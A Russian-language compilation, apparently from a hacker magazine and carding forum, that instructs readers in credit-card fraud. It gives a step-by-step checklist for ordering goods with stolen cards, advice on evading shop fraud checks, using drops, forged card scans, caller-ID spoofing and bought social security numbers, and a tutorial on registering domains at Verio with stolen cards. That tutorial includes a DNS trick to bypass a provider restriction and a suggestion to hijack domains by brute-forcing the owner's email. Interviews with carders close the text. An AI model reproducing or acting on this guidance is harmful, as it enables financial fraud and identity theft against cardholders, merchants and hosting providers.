1. Покупаем СС, лучше без vbv кода. На заметку: 1. Есть шопы, которые не просят vbv код, даже если СС с кодом. 2. Если вбивать электронику, то с вероятностью 98% без vbv кода вбить СС не прокатит, т.е. придется покупать только с vbv.

2. Покупаем дедик под штат СС.

3. Ищем шоп. Если есть шоп, пункт пропускаем. Хитрости поиска шопов есть в материалах.

4. Регистрируем почту. Регистрируем в зоне com, с абстрактным названием чтобы сошло для женщины и для мужчины, например, watercould98, likechokоlade и т.п.

5. Заходим на дедик.

6. Вбиваем. ну и все) Важный момент шиппинг и билинг адресов. Здесь нужно экспериментировать или узнавать у саппорта шлет ли на отличный биллинг или нет. Есть шопы, в которых указываешь одинаковый билинг и шиппинг адрес причем сразу дропа, данные сс не меняешь, т.е. идет соответствие адресов, но нет проверки адреса и холдера. Самые удобные шопы для вбива)

Чтобы шоп слал на одного дропа несколько раз можно менять местами имя и фамилию, делать 2-3 ошибки в имени, также указываем адрес соседа.

Любые проблемы лучше решать, написав сразу саппорту, что и почему не проходит оплата, они ответят и если повезет, за тебя сами проведут оплату.

Вещевой кардинг

Вещевой кардинг получил наибольшее распространение среди кардеров. Его суть заключается в заказе товаров в интернет-магазинах по чужим кредитным картам с целью последующего сбыта.

Схема работы вещевика, вроде бы, лежит на поверхности. Это привлекает многих начинающих кардеров, которым все кажется понятным и простым. На самом деле заниматься вещевым кардингом не так легко. Чтобы получать доход, нужна цепочка людей, которые будут слаженно работать.

Как закалялась сталь

В середине 1990-х годов никто еще не слышал о махинациях с кредитными картами, а редкие случаи пропажи денег были ошибками магазинов и банков. Поэтому непуганые интернет-магазины охотно принимали несуществующие сгенерированные кредитные карты, алгоритм которых был таким же, как и у настоящих карт. Проверив алгоритм, интернет-магазины высылали заказанный товар. Обман вскрывался только в конце месяца, когда магазины запрашивали у банков перевод денег с карт на оплату товара. Естественно, что денег магазин не получал, так как запрошенных кредитных карточек просто не существовало в природе.

В это время в странах СНГ стало возможным получить доступ к интернету. Первыми пользователями были в основном преподаватели и студенты вузов. Эти студенты и составляли основу зарождающегося кардерства СНГ. Голодные студенты кардили все, что только можно, делая упор на электронику и ювелирные изделия. Особым рвением отличались украинские кардеры, которые организовали в Киеве целую сеть по транспортировке, хранению и сбыту накарженного. Десятки квартир покупались под склады для хранения электроники, которую не успевали сбывать по бросовым ценам. На таможенном терминале в киевском международном аэропорту Борисполь круглосуточно дежурили несколько грузовиков, вывозивших груз после каждого международного рейса. Таможенники, быстро оформлявшие прибывшие грузы, тоже в накладе не оставались. Товар из европейских магазинов в основном доставлялся наземным путем. Объем товара был настолько велик, что нередко магазины отправляли свои фуры прямо на Украину, не прибегая к услугам почты. Многие магазины всерьез задумались об открытии своих филиалов в СНГ.

Товар сбывался по подложным документам через оптовые и розничные магазины, которые были заинтересованы в покупке фирменной электроники по низким ценам. Огромный поток скарженной электроники привел к затовариванию украинского рынка. Сложилась парадоксальная ситуация, когда можно было купить оперативную память по цене в два раза дешевле отпускной цены производителя. Легальные поставки электроники, особенно компьютеров, практически прекратились.

Сказка не могла длиться вечно. ФСБ совместно с Интерполом уже некоторое время следили за вызывающей деятельностью кардеров. В 1996 году по Украине, России и Белоруссии прокатилась волна арестов. Главари кардерских группировок и их приближенные были арестованы. О дальнейшем существовании таких сообществ не могло быть и речи, теперь каждый был сам за себя. Товар старались сбыть сразу после получения, работали в основном поодиночке или небольшими группами, не привлекая лишних людей.

Палки в колеса

Долго такой беспредел продолжаться не мог. Из-за действий кардеров очень многие интернет-магазины разорились. Оставшиеся магазины объявили страны СНГ вне закона и перестали слать в СНГ товар. Причем даже по легальной кредитной карте заказать что-то в иностранных магазинах жителям СНГ было очень и очень трудно. В то время мой знакомый заказал в европейском интернет-магазине по своей кредитке какую-то редкую книгу. После заказа ему позвонили из магазина и попросили назвать все реквизиты его кредитной карточки. Потом попросили выслать отсканированную с двух сторон кредитку. И когда все требования магазина были выполнены, оттуда после недели раздумья пришел ответ, что по техническим причинам товар не может быть выслан. Такие пироги.

Многие думали, что это конец недолгой жизни вещевого кардинга, но выход был найден. Если они не шлют нам, то будут слать в свою страну! Теперь кардеры искали иностранца, который бы принимал товар и за вознаграждение пересылал его в СНГ либо продавал у себя на родине, высылая часть денег (а часть себе в карман). С тех пор кардеры специализируются по регионам: США, Великобритания или Европа. При этом, например, европейские магазины без проблем шлют товар в пределах Европы, в том числе и в такие близкие нам страны, как Латвия, Болгария и даже Украина.

Следующим ударом по кардерскому ремеслу стал постепенный отказ в приеме сгенерированных кред. В связи с большими убытками магазинов, у банков появились новые сервисы, позволяющие магазину проверять достоверность данных о кредитной карте на лету или в разумные сроки (раньше магазин узнавал, что его надули, уже после того, как покупка отправлялась заказчику). И теперь магазин мог отсеять несуществующую кредитку еще до отсылки товара. Но и эту преграду удалось преодолеть. Из-за несовершенства защиты интернет-магазинов можно было утянуть у них базу данных с информацией о кредитных картах клиентов, делавших у них покупки.

С этого момента многие добропорядочные американцы боялись делать покупки в интернет-магазинах. И правильно делали. Каждый магазин уверяет покупателей, что у него самая надежная защита. Но было бы намного лучше, если бы магазины просто не хранили информацию о покупателях у себя на сервере. Иногда можно, введя в поисковике что-нибудь типа "credit card name address", выйти на список кредитных карт, который хранится на сервере интернет-магазина. То есть информация о кредитных картах в этом случае настолько незащищена, что даже индексируется поисковыми системами! Теперь, когда в магазине делали заказ по существующей карте, он снимал с нее деньги (или просто проверял ее существование, а деньги снимал в конце месяца). Через некоторое время настоящий владелец карты обращался в банк и опротестовывал транзакцию. Банк, в свою очередь, разбирался с магазином. Но поезд ушел, товар выслан, а магазин опять в дураках.

Новым шагом в защите от фрауда стал запрос магазинами кода cvv2 при покупке. Тут уж думали, что кардингу пришел конец. Фишка здесь в том, что этот код - 3 последние цифры номера на задней стороне карты, знать его может только владелец карты, который держит ее в руках. Теперь любые махинации с кредитными картами стали в принципе невозможны, так как код cvv2 узнать нельзя никак. Изначально планировалось, что cvv2 не будет сохраняться ни на какой стадии обработки кредитной карты. То есть он сообщался только банковской системе обработки карт, а уже из банка шло подтверждение или отказ. Но хотели как лучше, а получилось как всегда. Интернет-магазины, нарушая все требования банков, стали сохранять код cvv2 со всей остальной информацией о кредитных картах в своих базах данных. Ну, а базы, в свою очередь, так же спокойно, как и раньше, воровались, а кардеры получали доступ к cvv2. Все вернулось на круги своя. И пенять интернет-магазинам оставалось только на себя.

Вещевой кардинг сегодня

Сейчас вещевой кардинг переживает не лучшие времена, но и сдавать позиции не собирается. Наблюдается некое равновесие среди покупок в интернет-магазинах: с одной стороны, потери интернет-магазинов на кардерских заказах покрываются прибылью с легальных покупок, с другой стороны, этих заказов хватает кардерам, чтобы свести концы с концами и не умереть с голоду. Сегодня вещевой кардинг продолжает оставаться популярным среди новичков, хотя некоторые и разочаровываются в нем, забывая про кардинг навсегда.

Анонимность и безопасность

Главное, на что стоит обратить внимание, это безопасность и анонимность при занятии вещевым кардингом. При заказе товара в интернет-магазине специальные скрипты могут узнать дополнительную информацию о пользователе. Так, например, если ты работаешь с американскими интернет-магазинами, то и твой компьютер должен выглядеть как компьютер типичного американца. Это значит, что установленная операционная система должна быть от начала и до конца английской - магазин может насторожить даже наличие русского языка для ввода с клавиатуры. Твой часовой пояс должен быть не просто американским, а соответствовать локальному часовому поясу твоего дропа (человека, который получает товар из магазина и пересылает тебе). При заказе в интернет-магазине обязательно использование анонимного proxy-сервера. И крайне желательно, чтобы IP этого proxy-сервера соответствовал штату твоего дропа, а еще лучше городу.

Практические советы

Тебе также следует знать, что настоящий американец совершает покупки в интернет-магазине либо во время обеденного перерыва на работе, либо вечером у себя дома. Соответственно, в эти часы интернет-магазины получают больше всего заказов, и у твоего заказа будет меньше шансов привлечь внимание менеджеров магазина. Отдельно стоит упомянуть покупки подарков на Рождество и другие праздники. В этот период с виртуальных полок интернет-магазинов покупатели метут все подряд, раскупается даже самый залежалый товар. Интернет-магазинам на этот период приходится нанимать дополнительных работников. Также стоит обратить внимание на официальные выходные в той стране, на которой ты специализируешься. Заказы, сделанные в праздничные дни, будут обработаны только через несколько дней, а эта задержка может стать роковой, так как у владельца карты будет время, чтобы опротестовать платеж.

Кредитную карту для покупки в интернет-магазине следует подбирать очень тщательно. Карта должна соответствовать штату, а лучше городу твоего дропа, тогда можно попробовать указать при заказе разные адреса дропа и владельца карты и постараться убедить магазин, что ты (как владелец карты) решил сделать подарок своему племяннику на другом конце города. Если есть возможность, лучше купить карту с онлайн-доступом. В таких картах можно заходить на сайте банка в специальный раздел и менять там адрес держателя карты. Если адрес сменить на адрес дропа, то у магазина в принципе отпадут всякие сомнения в легальности покупки, так как он высылает покупку на адрес держателя карты. Но и тут все не так просто. Дело в том, что смена адреса держателя карты очень схожа с шаманством и плясками с бубном вокруг костра. Иногда адрес на карте меняется без вопросов, а иногда банк начинает сомневаться и ничего не получается. Кстати, многие кардеры очень суеверные люди.

Интернет-магазин, в котором будет сделан заказ, также надо тщательно подбирать. Не стоит делать заказ в больших интернет-магазинах с хорошей службой безопасности. Надо выбрать небольшой интернет-магазин, который обычно является лишь интернет-витриной обычного магазина. Доля покупок через интернет в таком магазине очень мала, поэтому нет квалифицированного персонала, отслеживающего покупки кардеров.

Если интернет-магазину что-то кажется подозрительным, он может потребовать выслать ему отсканированную кредитную карточку или спросит твой телефон, либо предложит тебе самому позвонить в магазин. Скан кредитной карты наши умельцы тебе за несколько десятков баксов сделают такой, что будет лучше оригинала, а вот с телефоном придется помучиться. Можно договориться со своим дропом о подтверждении по телефону, можно найти отдельного человека. И если с дропом все просто, то отдельный человек может жить в другом штате. Тогда придется пользоваться антиАОНами, которые подменят номер телефона на тот, который будет соответствовать штату дропа.

В последнее время стала очень актуальной тема по интернет-магазинам Австралии и Новой Зеландии. Из-за их отдаленности от других стран там существует лишь немногочисленный местный вещевой кардинг, который контролируется китайской мафией. Поэтому магазины без лишних вопросов шлют товар не только по своим странам, но и за границу, даже в Россию. Правда, срок доставки в Россию намного больше, чем из Америки, из-за хуже развитых служб почтовой доставки. Еще одной проблемой является добыча австралийских и новозеландских кредитных карт. Из-за того, что из этих стран мало кто кардит, очень малое количество карт можно приобрести. А если у продавца и появляются австралийские кредитки, то по ценам в несколько раз больше американских или европейских.

Ох уж эти дропы

Если магазин все-таки выслал товар, то все равно еще рано пить шампанское и праздновать победу, так как между тобой и товаром есть еще дроп. Очень часто дропов берет ФБР, а иногда сами дропы могут тебя кинуть. В найме дропа есть два пути. Первый - с самого начала все ему рассказать, чтобы он знал, на что идет. В этом случае он сможет подтверждать заказы по телефону и всячески способствовать получению товара. Либо можно найти какую-нибудь домохозяйку, которая за несколько сотен в месяц будет не прочь подработать получением и пересылкой посылок. Но у этого пути есть куча минусов. Домохозяйка, будучи существом глупым, может делать такие вещи, которые ты себе и представить не сможешь. Например, был случай, когда на адрес такого вот дропа пришла посылка, но из-за того, что дропа несколько раз не заставали дома, посылку отправили обратно в магазин. И это при том, что время прихода почтальон каждый раз согласовывал с домохозяйкой по телефону! Но даже когда товар благополучно получен дропом и выслан тебе, радоваться все еще рано. Бывали случаи, когда дроп путал адрес, и посылка отправлялась обратно. Радоваться будешь, когда товар будет уже у тебя в руках.

А как же Россия?

Многих, наверное, мучает вопрос о российских интернет-магазинах. Сам факт кардинга из российских магазинов подразумевает использование кредитной карты нашего соотечественника. Среди кардеров существует негласное правило - не трогать своих. И если на кардерских форумах проскакивает объявление о продаже базы с русскими кредитками, то оно сразу удаляется. Еще одна причина - бдящие службы безопасности интернет-магазинов, тесно сотрудничающие с правоохранительными органами. И если, кардя товар из американских магазинов, кардер может не беспокоиться, что из-за нескольких ноутбуков его объявят в международный розыск, то ФСБ по наводке российского интернет-магазина быстро найдет мошенника.

Бесконечная история

Несмотря ни на что, кардинг продолжает жить. И на каждую новую уловку магазинов найдется свое средство. Главное помнить, что все, в конечном счете, зависит от менеджера интернет-магазина, который занимается твоим заказом. Был у меня случай, когда магазин не захотел мне высылать товар, требуя телефонного звонка. Тогда я написал им жалобное письмо, что сейчас не имею доступа к телефону, а цифровой фотоаппарат предназначается моему сыну, у которого через три дня день рождения. А подарок как раз тот, о котором сын давно мечтал. Я попросил выслать покупку и пообещал, что обязательно позвоню в магазин через неделю. И это сработало! Так что никогда не стоит забывать про человеческий фактор.

Схема вещевого кардинга
  1. Кардер, предварительно организовав свою безопасность и анонимность в Сети, делает заказ в интернет-магазине.
  2. Магазин может попросить позвонить и/или выслать отсканированную кредитную карту. Скан кредитки рисует специальный человек. Звонок в магазин тоже делается человеком с антиАОНом, чтобы все выглядело, как будто звонит законный владелец карты.
  3. Магазин высылает покупку твоему человеку (дропу) в стране, где находится интернет-магазин.
  4. Дроп продает товар на месте, оставляя часть денег себе, либо пересылает товар тебе.
Кредитки с онлайн-доступом

Многие американские банки предоставляют своим клиентам доступ к информации о кредитной карте на банковском сайте. Введя на сайте номер карты и пароль, клиент может посмотреть статистику транзакций, изменить адрес и т.п. На самом деле из любой кредитной карты соответствующего банка можно сделать карту с онлайн-доступом. Для этого надо, кроме информации о кредитной карте, знать лишь номер социального страхования ее владельца, который известен только ему самому. Но в интернете можно найти людей, которые имеют доступ к базам данных с номерами социального страхования. И за 5-10 баксов они по имени владельца карты выдадут тебе номер социального страхования.

Proxy-серверы

Лучше всего proxy-серверы покупать, тогда ты сразу получаешь именно тот сервер, который тебе нужен. Но если ты начинающий кардер и денег у тебя немного, то можно взять адреса серверов на сайтах, посвященных компьютерной безопасности. Отсортировать сервера по штатам и городам поможет программа Proxy Checker. Теперь, когда ты нашел сервер нужного тебе штата, подставь адрес и порт сервера в свой браузер.

Чтобы убедиться в своей анонимности, зайди на https://whoer.net и просмотри путь пакетов от сервера. Последним адресом пакетов должен быть твой proxy-сервер.

Схема работы вещевика, вроде бы, лежит на поверхности. Это привлекает многих начинающих кардеров, которым все кажется понятным и простым. На самом деле заниматься вещевым кардингом не так легко.

Самый правильный хостинг

Любой кардер должен иметь ряд незаменимых вещей. Это кредитка, хороший хостинг (чтобы дурить наивных буржуев) и, конечно же, домен. Домен - это не пустой звук и предмет понтов. Именно звучное имя проекта притягивает к себе новых клиентов и вызывает уважение к его владельцу. Разумеется, чтобы не иметь никаких проблем после регистрации домена, следует уделить большое внимание двум вещам. Во-первых, названию домена, которое, как я уже сказал, имеет огромное значение. А во-вторых, грамотно выбрать хостинг, который предоставит любителю картона заветное имя второго уровня. Если первый пункт останется на совести кардера, то со вторым тебе поможет разобраться эта статья.

Сказание о хостингах

Как уже было сказано, необходимо выбрать хороший хостинг, чтобы зарегистрировать домен. Компании, предоставляющие подобные услуги, делятся на несколько видов: те, которые прописывают имя на собственном сервере и предоставляют владельцу определенные права (FTP/WEB/SSH доступ), а также дающие только зону для домена. При этом первичный и вторичный DNS-серверы должны являться собственностью клиента. Существует и третий вариант - золотая середина, хостинг, позволяющий переносить зоны на другой DNS-сервер. Таким является знаменитый https://www.verio.com. Об этой компании и пойдет речь в этой статье.

Вообще, альтернатив Verio очень много - тот же www.register.com. Но все они, как правило, замораживают домен при отрицательном балансе на кредитке. В случае с Верио этого не происходит - домен умирает лишь по истечении периода существования зоны. А его, как известно, можно продлить без особых проблем. К тому же, если бабки на карте закончатся, Verio оставит клиенту не только домен, но и панель управления, где можно выполнить ряд действий: изменить зону, добавить почтовый аккаунт, выполнить апгрейд плана, посмотреть статистику и многое другое. Об этом я обязательно расскажу, но всему свое время.

Регистрация - дело тонкое

Итак, ты проникся и захотел стать клиентом Verio. Ты выбрал правильный путь, ведь если домен будет зарегистрирован с учетом следующих советов, никаких проблем не будет. Для успешной регистрации тебе понадобится рабочая (читай - с положительным балансом) кредитная карта с наличием cvv2 (специального защитного кода) и немного терпения. К слову о кредитке, совсем недавно Verio была чуть ли не единственной компанией, регистрирующей домены без cvv2-кода. Теперь все изменилось, и в форму было добавлено соответствующее поле. Но такому кардеру, как ты, достать cvv2, я думаю, будет несложно.

На главной странице с правой стороны ты увидишь небольшую форму. Вводи туда желаемое имя домена и жми "Check it". Тебя перекинет на первую ступень регистрации - выбор домена. В случае если имя будет свободно, появится сообщение, иначе высветится форма для выбора альтернативного домена.

Когда имя будет определено, наступает второй шаг регистрации - выбор плана хостинга. Тебе будет предложено два варианта - купить зону только для "парковки", либо выбрать специальный план для нее. Щелкай по второму пункту и попадешь на страницу с выбором типа регистрации. Советую выбрать UNIX GOLD PLAN. Пусть он и дорогой (около $100 за месяц), но проблем с переносом зон у тебя точно не будет. Хотя сложностей не будет при любом плане, так как существует один секрет, позволяющий обманывать защиту компании. Когда действия будут подтверждены, у тебя спросят личные данные. Из них ты, конечно же, занесешь только свой e-mail, остальные сведения будут о владельце карты. Кстати, за этим адресом будет закреплен твой личный аккаунт на Verio - при вторичной регистрации домена тебе потребуется лишь ввести свой пароль и/или инфу о новой кредитке.

На предпоследнем шаге кардеру предстоит занести информацию о карте - на этом я не буду останавливаться, так как такие операции ты производишь очень часто.

Ну и, наконец, для завершения сделки, подтверди свою покупку и получи благодарность от Verio. Компания пообещает отправить тебе письмо после проверки кредитной карты. Теперь один нюанс: если ты получаешь два письма с промежутком около 10 минут - все отлично, запрос прошел, и домен забит за тобой (первое письмо содержит запрос о регистрации, второе - правила хостинга). В противном случае - карта невалидна, и придется производить новую сделку.

Через день на твой ящик придет еще одно письмо, на этот раз с данными о твоем домене. Теперь можешь прыгать от радости и ждать, пока обновятся зоны и твой домен будет откликаться на запросы. Поначалу довольствуйся IP-адресом, за которым закреплен личный FTP-доступ и панель управления именем. В довесок к этому будут предоставлены DNS-серверы и правила пользования хостингом.

Прелести Control Panel

Теперь можно проверить работу Control Panel и залогиниться под выданным аккаунтом. Панелька находится по адресу http://ip-address/stats/. Для доступа к ней выдается 6-значный логин, который является частью твоего домена (например, для www.supercard.to логин будет superc). Пароль генерируется из 8 случайно взятых символов.

Когда будешь внутри, не помешает сменить пароль на более удобный (но не менее сложный). Это делается во вкладке Change Password. Теперь самое время заняться раздачей e-mail аккаунтов. Если ты взял себе план выше, чем DNR (Domain Registration Only), то тебе будут предоставлены от десяти аккаунтов по POP3/IMAP, а также доступ к SMTP. Чтобы добавить новую POP3-запись, перейди в соответствующий раздел и задай пользователю логин и пароль. После этого жми Change, и аккаунт успешно добавится в базу.

Иногда приходится добавлять редирект-запись, то есть адрес, с которого пришедшие письма будут автоматически пересылаться на указанный в форме мыльник. С этим ничего сложного, надо лишь чуть выше отметить значение формы, названное "All email not specifically forwarded will be sent to". В случае если аккаунта не существует, все письма будут автоматически пересылаться на этот адрес. Это очень удобно и позволяет полностью контролировать почтовую систему твоего домена.

Для работы с e-mail существует приятная оболочка Webmail. Раньше она входила в любой хостинг-план на халяву, теперь же за нее просят 10 американских президентов ежемесячно (нашли, на чем нажиться). Но стоит сказать, что скрипты Webmail сделаны на ура - в них существует все, что пригодилось бы рядовому пользователю. Ссылка на Webmail - www.supercard.to/webmail/ либо https://webmail.supercard.to/.

Также присутствует интересный раздел "Domain Manager", который находится вверху на панели инструментов. Там можно без проблем зарегистрировать виртуальный домен. Он будет подвязан к главному, а оплата будет производиться по этой же карточке. Таким образом, просто заполни форму регистрации и не заботься об оплате имени - все произойдет автоматически. Кстати, процедура регистрации займет минимальное время, так как необходимо лишь поставить галочку, подтверждающую, что клиент ознакомлен с правилами хостинга, а затем аккуратно заполнить список новых имен и срок регистрации (от года до десяти лет). Если все сделано правильно и домен не занят - тебя попросят подождать денек, пока обновятся зоны. Особых проблем с созданием виртуального домена нет. Кстати, изменить, а тем более перенести зону такого виртуального имени тебе не удастся. Придется довольствоваться разделом Edit Pointers. Там возможна лишь подвязка определенного хоста к IP-адресу (создание домена третьего уровня).

Создание своих доменов

Когда ты получаешь полный доступ к зоне своего домена, то появляется возможность создания своих сабдоменов (уже третьего уровня), а также других весьма полезных полей DNS. Все это можно сделать во вкладке "Zone File Editor", которая находится в первом пункте управления "Manage My Web site".

Заходи туда и увидишь файл, в котором прописаны минимальные поля. В первую очередь, это SOA. Там находятся два e-mail адреса Postmaster'а и Hostmaster'а. Затем следует порядковый номер, время обновления и дата истечения срока зоны. Чуть ниже файла ты увидишь форму для новых записей, которую необходимо заполнить. Существует несколько параметров, разрешенных для добавления. Вот некоторые из них:

A. Нужен для подвязки нового сабдомена к IP-адресу. Например, запись subdomain.supercard.to. IN A 127.0.0.1 будет означать, что имя будет ссылаться на локальный адрес. Кстати, точка в конце сабдомена обязательна - она означает конец записи (в противном случае адрес будет иметь вид subdomain.supercard.to.supercard.to, то есть присоединяться к главному имени).

CNAME. Параметр позволяет создавать алиас для уже существующего имени. К примеру, admin.supercard.to. IN CNAME supercard.to. будет привязывать сабдомен к главному хосту, делая эти записи равнозначными.

MX. Расшифровывается этот параметр как Mail eXchanger. Все SMTP-службы работают со значением опции, предварительно запрашивая его с сервера имен. Это удобно, поскольку делает постоянным хост с работающим на нем smtpd для каждого домена. Пример использования:smtp.supercard.to. IN MX 10 222.222.222.222. Число 10 означает приоритет записи, соответственно, полей MX может быть несколько.

NS. Самая интересная опция, поскольку ее значение - NS-сервер для данного домена. Как я уже говорил, некоторые хостинги позволяют переносить записи с одного сервера на другой. Verio не исключение, но тут существует один нюанс. Дело в том, что если ты выбрал план DNR, изменить NS-сервер тебе не удастся (сценарий выругается на неверный план регистрации). Все было бы плохо, если бы не один трюк, позволяющий обмануть эту защитную систему. В случае, когда адрес NS-сервера содержит подстроку "verio", запрос обработается как надо, а адрес запишется в базу. Реализуется на практике это очень просто: в конфиге к твоему серверу приписывается следующая строка:

Code:
verio.cardns.net. IN A 222.222.222.222,

где 222.222.222.222 - IP-адрес сервера. После этого (когда зоны обновятся, а хост будет виден из глобала) можешь смело переносить DNS-сервер. Заполняем форму следующим образом:

Code:
supercard.to. IN NS verio.cardns.net.

Verio проглотит такой запрос, и через день зоны перенесутся на твою машину. Естественно, ты должен будешь позаботиться об этом заранее и составить конфиг для своего домена (он может совпадать с тем, что ты редактировал на Control Panel).

Стоит рассказать и об оформлении прямой зоны домена (именно она и будет переноситься на посторонний сервер). Для этого необходимо задать в главном named.conf информацию о местонахождении и значении зоны. Это делается следующим блоком данных:

Code:
zone "supercard.to" {

type master;

file "supercard.to.hosts";

allow-query { any; };

};

Здесь имя зоны - любое название (лишь бы ты понял, к чему ведет этот блок), тип - предназначение DNS, master или slave (во втором случае необходимо создать внутренний блок с masters-серверами). И, наконец, allow-query обрабатывает запросы от конкретных адресов (в нашем случае любой может запросить данные о домене). Параметров в блоке zone { } может быть много, каждый из них отвечает за определенную вещь. За подробностями иди в man named.conf.

Теперь можно создавать файл supercard.to.hosts, который, как я уже говорил, не отличается от зоны на verio.net. Ты лишь можешь изменить первый параметр $TTL, который означает период, за который обновляются зоны. К примеру, его значение 1d говорит о том, что каждый день будет происходить синхронизация. Также допустимо указывать время в секундах. После всех модификаций конфигурационного файла bind, необходимо перезапустить демон. Для этого пошли процессу сигнал 1: killall -1 named.

Брешь в безопасности Verio будет на пользу кардеру, так как при выборе плана DNR, он может без проблем перетащить зоны на отдельный сервер и радоваться жизни.

TXT, SRV. Текстовые и служебные записи, которые могут быть внесены для разъяснения какой-либо информации. Так, например, можно уточнить некоторые электронные адреса. На них можно слать почту в определенных случаях (Spam, Abuse и т.п.).

Последнего параметра PTR, организующего обратный резолв (IP-адрес в hostname), ты не обнаружишь. Это обусловлено тем, что вторая зона хранится у Verio и держится в строгом секрете. Ты же вполне можешь обойтись без PTR, создавая свои красивые виртуальные хосты (пусть даже в одну сторону) с использованием опции A.

После такого описания параметров тебе несложно будет разобраться в прописке опций или переносе зон. Кстати, перенести их будет вполне логично, так как при отрицательном балансе на карте, Verio просто заблокирует FTP и WEB-доступ к сайту (останется только Control Panel). Все изменения в зонах будут немедленно отправлены на e-mail (под которым был зарегистрирован домен). Кстати, не забудь подтвердить редактирование. Это будет предложено сделать при нажатии на Submit.

Продление аккаунта и апгрейд плана

Как и любой хостинг, Verio поддерживает продление времени регистрации. Иными словами, когда у тебя заканчивается период, на который ты покупал домен, можно с легкостью его продлить. Возможно, потребуется найти другую кредитную карту. Для этого необходимо выбрать вкладку "Update Method" в разделе Billing твоей панели управления. Далее определить новые сроки и проплатить кредиткой с положительным счетом.

С апгрейдом плана все немного сложнее. Именно поэтому я советовал выбирать его сразу при регистрации. Вот что получилось в моем случае, когда я выбрал Silver Plan и захотел поменять его на Gold. Как выяснилось, для этого нужно было написать письмо администратору Verio с запросом. Затем мне пришел ответ, что моя карта истекла, и теперь мне нужно отправить ему новые данные. Все было выполнено по указанию, но вот ответ администратора меня шокировал. Для того чтобы проапгрейдить план, мне надо было позвонить по телефону в Штаты и подтвердить голосом данные о кредитке. Я забил на это дело и остался с серебряным планом. Думаю, ты бы поступил так же.

Как уже было написано, через два месяца при отрицательном счете Verio отрубит у тебя доступ к FTP и Web. Точнее, сотрет все твои каталоги и файлы, сам же вход будет возможным. Чтобы успеть забэкапить всю важную информацию, просто следи за почтовым ящиком - за три дня до события тебе упадет письмо, в котором будет написано об отключении аккаунта.

Забыли пароль?

Всякое может случиться, и запамятовать пароль на Control Panel может любой человек. Verio имеет автоматическую систему высылки подобной информации.

При логине на Web-админку ты увидишь стандартный запрос пароля от Apache. Если его ввести неверно три раза, сервер переведет тебя на страницу 403. Помимо ругани о неверном пароле, ты найдешь ссылку, ведущую на скрипт высылки забытого пароля. Никакой контрольной фразы и дополнительных данных - просто нажми "Send", и инфа уйдет на твой мыльник (за которым закрепляется домен).

Кстати, тут может возникнуть ряд идей, о хищении домена у владельца. Достаточно намутить простой POP3-брутфорс (либо просто увести мыло, на которое регился домен) и запросить данные на него - все, имя твое! Правда, учитывай, что хозяин запросто может его вернуть, но ничто не мешает тебе выслать пароль во второй раз.

Всем спасибо, все свободны!

Любой хостинг можно описать подобным образом. У каждого есть свои достоинства и недостатки, я это говорю с полной уверенностью, так как был клиентом пяти различных компаний. И этой статьи не было бы, если бы Verio не оправдал все мои ожидания. Конечно, у него есть свои минусы, так как идеального хостинга не существует, но сохранение всех зон и доступа к Control Panel после истечения срока кредитки меня весьма порадовало. Это не оставит равнодушным и тебя, ведь любой кардер не любит таких глобальных проблем, как утеря домена. Я думаю, ты не исключение.

Verio - далеко не единственная компания, предоставляющая услугу регистрации домена второго уровня. Вот краткий список подобных серверов.
Вопросы?

Control panel на Verio снабжена множеством ссылок на Help. Например, можно найти помощь по каждому хостинг-плану, FTP-доступу, webmail, виртуальным доменам, зонам и т.д. Кроме того, как утверждают на главной странице, любые вопросы, заданные по мылу, обязательно будут разрешены в короткие сроки.

Работа с DNS

Для проверки работоспособности зон нередко приходится пользоваться утилитой host. Вот полезные опции, которые могут тебя заинтересовать:

host -l hostname - выводит полный список сабдоменов, подвязанных к hostname.

host -t TYPE hostname - выводит значение параметра TYPE, который может иметь значение MX, NS и др. Обо всех опциях было подробно рассказано.

host hostname - выполнить преобразование hostname в IP-адрес.

Интервью с живыми кардерами

Какие-то зашуганные люди эти кардеры. Стучишься к ним в асю, предлагаешь интервью провести, объясняешь, что приватная инфа тебе на фиг не впала, что хочется просто поговорить "за жизнь". Так нет, плотно морозятся. Ведь я, возможно, полковник Мусоров из ФБР, сплю и вижу, как засадить всех на нары.

Короче, нервов мне попортили изрядно. Но мир не без добрых людей. На мое предложение откликнулись двое (настоящие имена и ники, естественно, не публикуются - прим. ред.).

XS: Сколько времени ты уже занимаешься кардингом? Расскажи о том, как и почему ты в это втянулся? Каким было первое дело, которое ты провернул?

dos: Серьезно занимался вещевым кардингом около года, 4 месяца назад бросил. Первой вещью, которую выслали, был простенький цифровой фотик. Радовался тогда, как слон. Вообще я не собирался становиться кардером, просто знал, что есть такие люди. Но как-то друг навел на один из кардерских форумов. Сначала почитал из любопытства, потом решил попробовать. Купил на свои деньги информацию о нескольких кредитных картах, и пошло-поехало. Бросил кардинг из-за того, что меня кинули подряд два человека. Кинули на дорогую электронику, которую я заказал, а долю свою не получил. У меня просто опустились руки, не хотелось дальше продолжать. Кардинг на самом деле очень нервное занятие.

XS: Насколько серьезно ты заботишься о своей privacy? Например, меняешь ли ты квартиры в целях конспирации? Доверяешь ли приватную инфу проверенным людям?

dos: Квартиры меняют только параноики. Инфу доверяю. Гораздо важнее не болтать о своем занятии направо и налево всяким друзьям-знакомым.

ВГ: Достаточно понимать, что ты делаешь, и как это может повлиять на твое дальнейшее будущее. Например, это интервью... По-моему, получилось хорошее размышление вслух ни о чем. Для меня не существует проверенных и не проверенных людей. Есть друзья, и есть те, с кем у меня только деловые контакты.

XS: Как, по-твоему, кардинг - это однозначно воровство или увлеченность знаниями об устройстве платежных систем?

dos: Кардинг - такое воровство, которое не имеет явной направленности против человека. Убытки от кардеров терпят банки и интернет-магазины, но не конкретные люди.

ВГ: Термин придумал не я. И тот, кто его придумал, дал конкретное ему объяснение. Кардинг - махинации при помощи кредитных карт и всего, что имеет к ним отношение (именно поэтому всех, кого судили за кардинг, судили по статье за мошенничество, а не за воровство).

XS: Есть ли у тебя легальная работа? Если да, расскажи о ней, если нет - почему не устроишься, и кем бы ты предпочел работать?

dos: Учусь в вузе на первом курсе. В будущем работа будет связана с защитой информации. Вполне возможно, что информацию придется защищать от тех же кардеров.

ВГ: Легальная или наемная? Легальная есть, а наемная (когда работаешь в какой-то компании) была, даже несколько, но... Вообще, я с радостью трудоустроюсь, когда в нашей стране начнут оплачивать труд должным образом, а не по 800-1500 долларов в месяц при 10-часовой занятости. При этом твой начальник ездит каждый день на новых шестисотых и семерках, а его сын, работающий с тобой же, но по 2-часовому дневному графику и 2-3 дня в неделю из пяти, получает 5000 долларов. И то "на мороженое". Предпочел бы работать в какой-нибудь из спецструктур. Например, на букву Ф :).

